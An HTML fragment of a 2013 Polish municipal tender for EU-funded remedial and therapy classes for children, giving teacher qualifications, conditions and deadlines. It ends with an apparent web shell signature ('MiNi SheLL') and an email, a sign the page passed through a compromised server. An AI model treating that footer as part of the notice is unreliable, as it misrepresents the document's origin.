9) przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024), 
10) niezwłoczne udostępnianie dokumentacji z zakresu realizacji umowy na żądanie uprawnionemu przedstawicielowi Zamawiającego, koordynatorowi projektu, dyrektorowi szkoły, organowi kontrolującemu, 
11) współpraca z koordynatorem projektu, dyrektorem szkoły, a także z pozostałą kadrą zaangażowaną do realizacji projektu.zew
Kwalifikacje wykonawcy:
1. Wykonawca winien posiadać stosowne kwalifikacje oraz doświadczenie zawodowe zapewniające świadczenie usług edukacyjnych na najwyższym poziomie, w sposób sumienny i staranny, według powszechnie obowiązujących standardów i norm w zakresie prowadzenia zajęć edukacyjnych dla dzieci. 
Wykonawca prowadzący zajęcia musi spełniać odpowiednio wymogi dotyczące wykształcenia określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400);

w zakresie części zamówienia:
­	1, 2, 3, 4, 5, 6, 7, 8, 9, 50, 51, 52, 53, 54, 55 (zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji)  - osoba posiadająca wykształcenie wyższe, kierunek (specjalność): kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe i kwalifikacje do prowadzenia zajęć z zakresu terapii pedagogicznej lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznym i kwalifikacje do prowadzenia zajęć z zakresu terapii pedagogicznej;
­	10, 11, 12, 13, 14, 15, 16, 17, 18, 44, 45, 46, 47, 48, 49, 56, 57, 66, 67, 68, 69 (zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych oraz zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze) - osoba posiadająca wykształcenie wyższe, kierunek (specjalność): kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznym;
­	19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 (zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy) - osoba posiadająca wykształcenie wyższe na kierunku logopedia oraz przygotowanie pedagogiczne lub wykształcenie wyższe na dowolnym kierunku i studia podyplomowe w zakresie logopedii oraz posiada przygotowanie pedagogiczne; 

­	34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 58, 59, 60, 61, 62, 63, 64, 65 (gimnastyka korekcyjna dla dzieci z wadami postawy) - osoba posiadająca kwalifikacje w zakresie prowadzenia zajęć gimnastyki korekcyjnej i przygotowanie pedagogiczne - wykształcenie wyższe, kierunek wychowanie fizyczne z przygotowaniem pedagogicznym i kwalifikacje do prowadzenia gimnastyki korekcyjno-kompensacyjnej lub wykształcenie wyższe z przygotowaniem pedagogicznym - studia podyplomowe wychowanie fizyczne z gimnastyką korekcyjno-kompensacyjną albo kurs kwalifikacyjny dający kwalifikacje do prowadzenia zajęć gimnastyki korekcyjno-kompensacyjnej lub inne wykształcenie wyższe na kierunku, którego zakres obejmuje treści prowadzonych zajęć gimnastyki korekcyjno-kompensacyjnej z przygotowaniem pedagogicznym.

2. Wykonawca prowadzący zajęcia musi posiadać doświadczenie i minimalny staż pracy - 3 lata.

Ze względu na specyfikę zamówienia zamawiający nie dopuszcza udziału podwykonawców 
w realizacji przedmiotu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.41.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 69.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli
      przepisy prawa nakładają obowiązek ich posiadania.
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  posiadają wiedzę i doświadczenie
        Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. posiadanie wykwalifikowanej kadry zdolnej do realizacji przedmiotu zamówienia 
w zakresie poszczególnych części zamówienia i wg następujących kwalifikacji:
Wykonawca winien posiadać stosowne kwalifikacje oraz doświadczenie zawodowe zapewniające świadczenie usług edukacyjnych na najwyższym poziomie, w sposób sumienny i staranny, według powszechnie obowiązujących standardów i norm w zakresie prowadzenia zajęć edukacyjnych dla dzieci. 
Wykonawca prowadzący zajęcia musi spełniać odpowiednio wymogi dotyczące wykształcenia określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400)

w zakresie części zamówienia:
­	1, 2, 3, 4, 5, 6, 7, 8, 9, 50, 51, 52, 53, 54, 55 (zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji)  - osoba posiadająca wykształcenie wyższe, kierunek (specjalność): kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe i kwalifikacje do prowadzenia zajęć z zakresu terapii pedagogicznej lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznym i kwalifikacje do prowadzenia zajęć z zakresu terapii pedagogicznej;
­	10, 11, 12, 13, 14, 15, 16, 17, 18, 44, 45, 46, 47, 48, 49, 56, 57, 66, 67, 68, 69 (zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych oraz zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - zajęcia matematyczno-przyrodnicze) - osoba posiadająca wykształcenie wyższe, kierunek (specjalność): kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznym;
­	19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 (zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy) - osoba posiadająca wykształcenie wyższe na kierunku logopedia oraz przygotowanie pedagogiczne lub wykształcenie wyższe na dowolnym kierunku i studia podyplomowe w zakresie logopedii oraz posiada przygotowanie pedagogiczne; 

­	34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 58, 59, 60, 61, 62, 63, 64, 65 (gimnastyka korekcyjna dla dzieci z wadami postawy) - osoba posiadająca kwalifikacje w zakresie prowadzenia zajęć gimnastyki korekcyjnej i przygotowanie pedagogiczne - wykształcenie wyższe, kierunek wychowanie fizyczne z przygotowaniem pedagogicznym i kwalifikacje do prowadzenia gimnastyki korekcyjno-kompensacyjnej lub wykształcenie wyższe z przygotowaniem pedagogicznym - studia podyplomowe wychowanie fizyczne z gimnastyką korekcyjno-kompensacyjną albo kurs kwalifikacyjny dający kwalifikacje do prowadzenia zajęć gimnastyki korekcyjno-kompensacyjnej lub inne wykształcenie wyższe na kierunku, którego zakres obejmuje treści prowadzonych zajęć gimnastyki korekcyjno-kompensacyjnej z przygotowaniem pedagogicznym.

Wykonawca prowadzący zajęcia musi posiadać doświadczenie i minimalny staż pracy - 3 lata.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta cenowa (załącznik nr 1).
2.	W celu potwierdzenia uprawnień - wykaz dokumentów potwierdzających kwalifikacje.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki wprowadzania zmian do treści umowy:
       -  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia 
             proponowanych przez zamawiającego lub wykonawcę , jeżeli te zmiany są korzystne dla 
             zamawiającego.
         -  z powodu wystąpienia dodatkowych okoliczności, niemożliwych do przewidzenia przed
             zawarciem umowy,
         -  z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez 
             czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego 
             bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w dużych 
             rozmiarach,
         -  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie 
             są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.leszno.bipgminy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - pok. 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Lesznie - pok. nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki  Priorytet IX - Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com